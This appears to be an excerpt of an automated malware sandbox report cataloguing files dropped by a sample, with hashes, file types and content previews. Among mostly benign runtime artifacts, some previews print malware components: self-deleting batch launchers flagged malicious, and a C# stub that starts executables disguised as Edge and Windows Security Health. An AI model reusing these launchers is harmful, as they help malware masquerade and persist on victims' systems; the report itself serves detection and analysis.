                                                                                                                                                                                                    SHA-256:644836BAE72B983CAF32A84FB85CAAB8C8C1D5590691C3E839DE6981DB2B89B0
                                                                                                                                                                                                    SHA-512:6AB3EC2F53482D11EC91CEB20333CAE119B6C3BC33ABF4E2ABA7EE6CF02C91F07065FBA06D5B986DC81A57C8FF5784CF658D317A1F15E1BC61F77500EF3A85D3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:sdUX2lx5i05vWS9ivloHE6c1U81PMuogazUhTtLYMcvrqSLgUj1X1UswAdD3uisyLZVg7cOBZP5mKuLBxV4m3RoFGhg0qSont7gQ7oi2Vz7mZFlQSBGZoG43vPZa6YVHlR3NO4EIwBRDUCqA5QhpLO9nCmfsOI66e0BHMYBX78mmy1jsiYep1q5WSQKlZV3oFVidBjyhOKrNmWyLDwJznQFy4oz6OZ8lE7hcSFr9k7bq8st6b9imMDAzQtjWu2TyLFIoyV27EKPqzYzL52eO1VZA7sMigVPromf2kFHFHkhByT924Xb1XE6zqHrGJTbt5hCM37lzvYHRxXMnsUoJ3XTjppMcXA6xJyGQQx96vlG96pBS5EYzoSzhNdhNuJbucUI9R5W5VsXSRUn9n4hTmHJ08iDxPvLlJVgmhBA9rce64hQ2zhj0mIIVKRBs1ipjgvI6xBcl3hmJnN6aSK8sLU9BNLbQARHJx4ZIZTEyF87Ff8s7Vkark7XLwHtmjLllZdWsxxB8GJnNX4fOdd5Z1ajzgOWRkcO3XWpCl9KhjblaUKy1leJFQLt83hLjbtYn4t0BOcndTX0azIfWaeqGTJmLmqIEylGzD7fkUxnI0pw3VTJvBzI6DRUvHpYiTjpsRAW2n4Cm1hPnWtzShXC8cJwvnudpYEzRAElV6RIGxgFfCqYXzFB6hqPHNlO3bWOws8nSHeVQP5K6ERt7VFzSD3tTyeHVCOpaRSxDCGPUtvqlfTC61RhVh5tzOUemWANAPuowdp5P0ejSMHxecLdvrU3Wj8yrl
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1396
                                                                                                                                                                                                    Entropy (8bit):5.350961817021757
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                                                                                                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                                                                                                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                                                                                                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                                                                                                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1613
                                                                                                                                                                                                    Entropy (8bit):5.370675888495854
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
                                                                                                                                                                                                    MD5:5ACBB013936118762389287938AE0885
                                                                                                                                                                                                    SHA1:12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
                                                                                                                                                                                                    SHA-256:28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
                                                                                                                                                                                                    SHA-512:E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                                                                                                                                                    Process:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):425
                                                                                                                                                                                                    Entropy (8bit):5.353683843266035
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                    MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                    SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                    SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                    SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                                                    Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                                                                                                                                    MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                                                                                                                                    SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                                                                                                                                    SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                                                                                                                                    SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:@...e................................................@..........
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):233
                                                                                                                                                                                                    Entropy (8bit):5.199865142863941
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:hCijTg3Nou1SV+DE1CHhJ23S8uoIKOZG1CHhJ23fYH:HTg9uYDEzdPi
                                                                                                                                                                                                    MD5:9ED880414CA0385A1522A2032540E98D
                                                                                                                                                                                                    SHA1:4678D1AC9D776BE6E088D68006CDEE8A7C93FB84
                                                                                                                                                                                                    SHA-256:5567BBCB574982E2D0D1E28380F86682F1DF3C8E593F503D2DA384AED6F1FC56
                                                                                                                                                                                                    SHA-512:9DE2758F2665C7D8BB287601B687455CE9CCBBB353C2DFA53D94DB9197FB4F23422AF7698BCAA946257003DF80E9D2E638DFD05E5BD2623849F5BF4CE1852CB4
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\4evtisdSvL.bat"
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):147
                                                                                                                                                                                                    Entropy (8bit):5.14108282680754
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mF5XIvBktKcKZG1CHyg4E2J5xAI2WrG:hCRLuVFOOr+DE74vKOZG1CHhJ23f4
                                                                                                                                                                                                    MD5:9A7996F700BDEC8714C4702C18307EEC
                                                                                                                                                                                                    SHA1:A8E3B460DF5620B4F630BCE0197E30575116E0D6
                                                                                                                                                                                                    SHA-256:FF44DB60FCF3C748F65B20FFEBE1E8A13B6466D66B17FC32FE7B8188A20B2AA8
                                                                                                                                                                                                    SHA-512:52D776B1A9528F3BCA4FAB02B16CC5A8EFD2D1855A86A7EADAC146903E6372D92E439CAC14EAA529A07B3945691398A1D3131C044AF94245C4A1BFD8A46E64C9
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\5CZTOTC2vN.bat"
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):25
                                                                                                                                                                                                    Entropy (8bit):4.163856189774724
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:W7NcuVxAVC:WSuEo
                                                                                                                                                                                                    MD5:08AFFDE2A9C49FFDB0996DC0CA45238D
                                                                                                                                                                                                    SHA1:BAE8049EF76769658EFFA55D80C8AFDF3AB6B61A
                                                                                                                                                                                                    SHA-256:64F9D4E2D818D94E7EAA9E5D555876546E764EE95B94E70957BFB5275DD5AA36
                                                                                                                                                                                                    SHA-512:133DB6E70154D7C8C56C1A5F03A8A6C182DA54F3888647979CBE0F18CCDAD7C7FBBEC619D5C0995C56747D4BFC7E49FF2D7DE61FF052108C51FEC6E9D7C967FB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:VSfCWamHh9KKgbT51SNf1NnMg
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):25
                                                                                                                                                                                                    Entropy (8bit):4.483856189774723
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:NeekGMv:0lv
                                                                                                                                                                                                    MD5:023CC520F2B188F45AC1671A86408170
                                                                                                                                                                                                    SHA1:333086076CF2DC352BD39B3DCFC5054EDEFA8E10
                                                                                                                                                                                                    SHA-256:61FEFF7E6D480AAF145EC0AA03918FE9F87AD5B6EA1DB07A27B9EF6C3E5B0481
                                                                                                                                                                                                    SHA-512:3E4E5A7A00086D90A198BA5021E3A4B1943006C09CBF2C9206625C5424EB43FC6DB0607C3DB37AE1A5620F1BD3CB51C360C99CAB6020DB9307FCEB5717F0D7F5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:2KWXYd8oxrOHwnuiA9PcuY1ta
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c0, 10 symbols, created Mon Sep 30 18:22:18 2024, 1st section name ".debug$S"
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1912
                                                                                                                                                                                                    Entropy (8bit):4.598970566516155
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:HH69taLzXzC9HMzwK80NSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ucN:MaLzXzC9fK80slmuulB+hnqXSfbNtmhr
                                                                                                                                                                                                    MD5:B6FEE23B7D7517238A6B96F75B4BE0ED
                                                                                                                                                                                                    SHA1:581761C2FEE38CD07C7D551751947A41F7BAC8EB
                                                                                                                                                                                                    SHA-256:41408180148B14E8D90F15825438A902B048E070BC9AAC1832F7CB4E4F0DCE79
                                                                                                                                                                                                    SHA-512:F1D930632B3569FA0E80075E9664C947419D7977D063FA9167634971FD5E4BC7FC2D3BC00794A611745A96A20FD32394EDFDA8CA350F43D4EAE2F5C9EE91D135
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:L...Z..f.............debug$S........H...................@..B.rsrc$01................t...........@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP.....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES3594.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d8, 10 symbols, created Mon Sep 30 18:22:18 2024, 1st section name ".debug$S"
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1936
                                                                                                                                                                                                    Entropy (8bit):4.552220283217173
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:Hva9wnOOgDHgwK80NaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+OUZ:3f+vK80EluOulajfqXSfbNtmhJZ
                                                                                                                                                                                                    MD5:56360597F1A29CC598E8CF882ADFC210
                                                                                                                                                                                                    SHA1:BD384631A7D71796507335AE2A6B3E1B2DAEFCAA
                                                                                                                                                                                                    SHA-256:30B19FF8A0BE5D01D12DDD7FA136BB5F192FB36F49FEFE094C5FC89D6718AB2A
                                                                                                                                                                                                    SHA-512:078C28BA5659A7883F81798E624C6DAEA806A09F91B0122B8AC2B8C8A808AA1E936B3D8C5145A078301BA94D31F95D30F6747B4633480C9817AA160A9403D958
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:L...Z..f.............debug$S........(...................@..B.rsrc$01................T...........@..@.rsrc$02........p...h...............@..@........;....c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP...................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES37B7.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):25
                                                                                                                                                                                                    Entropy (8bit):4.293660689688185
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:iK1qUZpNV78n:iK1q8pI
                                                                                                                                                                                                    MD5:76EEC88C194FE1A7E37B13698C6BA917
                                                                                                                                                                                                    SHA1:D210C7AA80BF427050B8F849AF137FA52B3B2DB2
                                                                                                                                                                                                    SHA-256:D6A1B5DD46B74E633129C5F083C0AD51A84814C517188A8AEF9D45640F869A93
                                                                                                                                                                                                    SHA-512:C07CDD327CAF3283D5253E2130F09FB9FEEF8964EFDA8F5231DA002109108F71B24B5D35CFADDEED142FFBA099D3451D51ADCA922CEFD10CFF2743137FFFF146
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:XRmgIJNKI1B7CeqgIdLhp1Gkv
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):403
                                                                                                                                                                                                    Entropy (8bit):5.062953550447485
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLyd3iFkD:JNVQIbSfhV7TiFkMSfh+kFkD
                                                                                                                                                                                                    MD5:863A0E4E259672B8C347B1BE96CE417A
                                                                                                                                                                                                    SHA1:CF401444D4AEE024EBB5281FD9E89DE9A6C7D9B9
                                                                                                                                                                                                    SHA-256:35DAF4E2843293135579B64A8E18CD0FC1DBDAC3FB360D80B3B70D4793E3AA41
                                                                                                                                                                                                    SHA-512:F37B1291BAF44D7C54CEB86D12F62650A49AFAEAFADE66411ED011099E03AB5549F320E281869B528DA3814EE80C98EC09A6B65E0CCF2A397518945ACB502009
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"); } catch { } }).Start();. }.}.
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):251
